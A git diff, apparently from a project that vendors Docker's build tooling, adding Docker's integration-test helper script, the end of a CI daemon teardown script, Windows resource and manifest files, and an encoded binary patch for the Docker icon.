+			echo >&2 "warning: PID $pid from $pidFile had a nonzero exit code"
+		fi
+	done
+
+	if [ -z "$DOCKER_TEST_HOST" ]; then
+		# Stop apparmor if it is enabled
+		if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then
+			(
+				set -x
+				/etc/init.d/apparmor stop
+			)
+		fi
+	fi
+else
+	# Note this script is not actionable on Windows to Linux CI. Instead the 
+	# DIND daemon under test is torn down by the Jenkins tear-down script
+	echo "INFO: Not stopping daemon on Windows CI"
+fi
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers
new file mode 100644
index 0000000000..7b73b2f140
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers
@@ -0,0 +1,79 @@
+#!/bin/bash
+
+: ${TEST_REPEAT:=0}
+
+bundle_test_integration_cli() {
+	TESTFLAGS="$TESTFLAGS -check.v -check.timeout=${TIMEOUT} -test.timeout=360m"
+	go_test_dir integration-cli $DOCKER_INTEGRATION_TESTS_VERIFIED
+}
+
+# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'.
+# You can use this to select certain tests to run, e.g.
+#
+#     TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit
+#
+# For integration-cli test, we use [gocheck](https://labix.org/gocheck), if you want
+# to run certain tests on your local host, you should run with command:
+#
+#     TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration-cli
+#
+go_test_dir() {
+	dir=$1
+	precompiled=$2
+	testbinary="$DEST/test.main"
+	testcover=()
+	testcoverprofile=()
+	(
+		mkdir -p "$DEST/coverprofiles"
+		export DEST="$ABS_DEST" # in a subshell this is safe -- our integration-cli tests need DEST, and "cd" screws it up
+		if [ -z $precompiled ]; then
+			ensure_test_dir $1 $testbinary
+		fi
+		cd "$dir"
+		i=0
+		while ((++i)); do
+			test_env "$testbinary" $TESTFLAGS
+			if [ $i -gt "$TEST_REPEAT" ]; then
+				break
+			fi
+			echo "Repeating test ($i)"
+		done
+	)
+}
+
+ensure_test_dir() {
+	(
+		# make sure a test dir will compile
+		dir="$1"
+		out="$2"
+		echo Building test dir: "$dir"
+		set -xe
+		cd "$dir"
+		go test -c -o "$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}"
+	)
+}
+
+test_env() {
+	(
+		set -xe
+		# use "env -i" to tightly control the environment variables that bleed into the tests
+		env -i \
+			DEST="$DEST" \
+			DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \
+			DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \
+			DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \
+			DOCKER_GRAPHDRIVER="$DOCKER_GRAPHDRIVER" \
+			DOCKER_USERLANDPROXY="$DOCKER_USERLANDPROXY" \
+			DOCKER_HOST="$DOCKER_HOST" \
+			DOCKER_REMAP_ROOT="$DOCKER_REMAP_ROOT" \
+			DOCKER_REMOTE_DAEMON="$DOCKER_REMOTE_DAEMON" \
+			DOCKERFILE="$DOCKERFILE" \
+			GOPATH="$GOPATH" \
+			GOTRACEBACK=all \
+			HOME="$ABS_DEST/fake-HOME" \
+			PATH="$PATH" \
+			TEMP="$TEMP" \
+			TEST_IMAGE_NAMESPACE="$TEST_IMAGE_NAMESPACE" \
+			"$@"
+	)
+}
diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc b/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc
new file mode 100644
index 0000000000..000fb35367
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc
@@ -0,0 +1,38 @@
+// Application icon
+1 ICON "docker.ico"
+
+// Windows executable manifest
+1 24 /* RT_MANIFEST */ "docker.exe.manifest"
+
+// Version information
+1 VERSIONINFO
+
+#ifdef DOCKER_VERSION_QUAD
+FILEVERSION     DOCKER_VERSION_QUAD
+PRODUCTVERSION  DOCKER_VERSION_QUAD
+#endif
+
+BEGIN
+  BLOCK "StringFileInfo"
+  BEGIN
+    BLOCK "000004B0"
+    BEGIN
+      VALUE "ProductName", DOCKER_NAME
+
+#ifdef DOCKER_VERSION
+      VALUE "FileVersion", DOCKER_VERSION
+      VALUE "ProductVersion", DOCKER_VERSION
+#endif
+
+#ifdef DOCKER_COMMIT
+      VALUE "OriginalFileName", DOCKER_COMMIT
+#endif
+
+    END
+  END
+
+  BLOCK "VarFileInfo"
+  BEGIN
+    VALUE "Translation", 0x0000, 0x04B0
+  END
+END
diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest
new file mode 100644
index 0000000000..674bc9422b
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+    <description>Docker</description>
+    <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
+        <application> 
+            <!-- Windows 10 -->
+            <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
+            <!-- Windows 8.1 -->
+            <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
+            <!-- Windows Vista -->
+            <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
+            <!-- Windows 7 -->
+            <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
+            <!-- Windows 8 -->
+            <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
+        </application> 
+    </compatibility>
+</assembly>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico
new file mode 100644
index 0000000000000000000000000000000000000000..c6506ec8dbd8e295d98a084412e9d2c358a6ba39
GIT binary patch
literal 370070
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
